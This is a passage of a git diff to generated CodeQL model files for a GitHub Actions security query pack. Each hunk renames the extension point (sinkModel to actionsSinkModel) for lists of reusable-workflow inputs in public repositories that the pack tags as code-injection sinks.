+++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce87..d5746b566cc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a2780..fbe9e286d2b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d3100794..6ba2fc75375d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a5..6d522b776dcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c366..c210f350439a 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b629..81eeb82033cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d9..6d81f2ff242a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cffd..b7ea7250825c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c043360..972b6f15baa4 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c64..07f0c5c0f691 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e6..6bbf33e7f89a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ffb..165965dd568a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a5..3d1e182458e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
index e3694a389735..689cc91871ab 100644
--- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
index f6f33154581e..0481c04cb671 100644
--- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
index 34efc8414d89..8c0c944a3937 100644
--- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
index 71866026ef91..8f4c44324088 100644
--- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
index 83d241d21c0c..9406f7d299cf 100644
--- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
index 3021de125684..36838ef4ddb1 100644
--- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
index d2cb1da1e9fd..8b16601e6c22 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
index c551a135a142..e8db2ff568de 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
index f469f5de268d..208e444adebc 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
index 7ec8dac3f7bb..41edf0b03737 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
index 4ce9252ce76c..faca7973f1f1 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
index abb5b43c3276..76db6821c5e6 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
index 9e9da70e88ec..383a88ed0556 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
index 8de3f4c1ca4a..bcd3b09ed688 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
index 5ec8c0969346..53e16f8771a4 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
index af9582282d0d..4310e028de16 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
index 61bbb9d53728..84d2f57a3fbc 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
index fdb440a742ff..7debf6960edc 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
index efd05d69abe4..640180b870af 100644
--- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
index 9be191425ffd..7ea3039b552b 100644
--- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
index 65a14c7cfaa1..ced66aee32f6 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
index 2c031ea9dc62..e63440d1fcae 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
index b90aacee9ca1..f7021148c514 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
index 56823f4e1acc..8345368057c7 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
index 0f2937f9d148..3754ebfa63d1 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
index a88c74f85375..3e35747b558a 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
index b7dfd8fcc9b1..a13f6863caa5 100644
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
index 9de8130a93e6..af5c300ea8bd 100644
--- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
index ea4980b8cd7a..449ea8b7b490 100644
--- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
index 8787c7e32c9a..6656d42c4e69 100644
--- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml
